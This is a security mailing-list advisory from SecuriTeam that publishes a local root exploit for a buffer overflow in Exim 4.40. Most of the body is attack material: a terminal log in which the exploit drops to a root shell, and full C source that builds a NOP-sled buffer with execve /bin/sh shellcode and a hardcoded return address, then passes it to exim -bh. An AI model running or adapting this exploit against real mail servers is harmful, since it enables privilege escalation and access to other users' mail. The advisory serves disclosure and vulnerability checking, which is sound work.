[EXPL] Exim Buffer Overflow Exploit (Local, dns_build_reverse)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Exim Buffer Overflow Exploit (Local, dns_build_reverse)
------------------------------------------------------------------------


SUMMARY

 <http://www.exim.org/> Exim is "a mail transfer agent (MTA) for Unix 
systems similar to Sendmail". Local exploitation of a  
<http://www.securiteam.com/unixfocus/5CP0D1PEKW.html> buffer overflow 
vulnerability in Exim 4.41 allows execution of arbitrary commands with 
elevated privileges. The following exploit code can be used to determine 
whether your system is vulnerable or not.

DETAILS

Vulnerable Systems:
 * Exim version 4.40

Example:
plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December  3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!

**** SMTP testing session as if from host
::%A:::::::::::::::::1 FF  V
                                                            
        N 1  @      /bin/sh
**** but without any ident (RFC 1413) callback.
        
**** This is not for real!

> > > host in host_lookup? yes (matched "*")
> > > looking up host name for ::%A:::::::::::::::::1 FF  V
                                                       
N 1  @      /bin/sh
> > > IP address lookup using gethostbyaddr()
> > > IP address lookup failed: h_errno=1
LOG: no host name found for IP address
::%A:::::::::::::::::1 FF  V
                                                            
     N 1  @      /bin/sh
sh-2.05b#
     
sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$

Exploit:
/*
 * ripped straight off iDEFENSE advisory - so lazy I just picked
 * up GDB... bored on a weeknight :(
 *
 * nothing to write home to mother about due to the fact that
 * you need a local user account on a server and all you
 * get is to read other people's emails ....
 *
 * not even my own shellcode. aleph1 shellcode - cut and paste job
 * with nops to pad.
 *
 * Regards,
 * Plugger aka Tony Lockett
 *
 *
 *
 */

char bomb[288]=

/* the gear from iDEFENSE */
"::%A:::::::::::::::::"                             /* 21 bytes  */
                                                    /* --------  */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"                                          /* 218 bytes */
                                                    /* --------- */
/* actual code courtesy Aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"  /* 12 bytes  */
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"  /* 12 bytes  */
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"              /* 9 bytes   */
"\xe8\xdc\xff\xff\xff/bin/sh"                       /* 12 bytes  */

/* where EIP should point */
"\xf4\xf2\xff\xbf";                                 /*  4 bytes  */
                                                    /* --------  */
                                                    /* 49 bytes  */
                                                    /* --------  */
                                                    /* 288 bytes */
                                                    /* ========= */
main()
{
  char *exim[4];
  exim[0] = "/usr/exim/bin/exim";
  exim[1] = "-bh";
  exim[2] = bomb;
  exim[3] = 0x0;
  printf("Firing up exim - cross your fingers for shell!\n");
  execve(exim[0],exim,0x0);
  return;
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:plug@internode.on.net> 
plugger.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.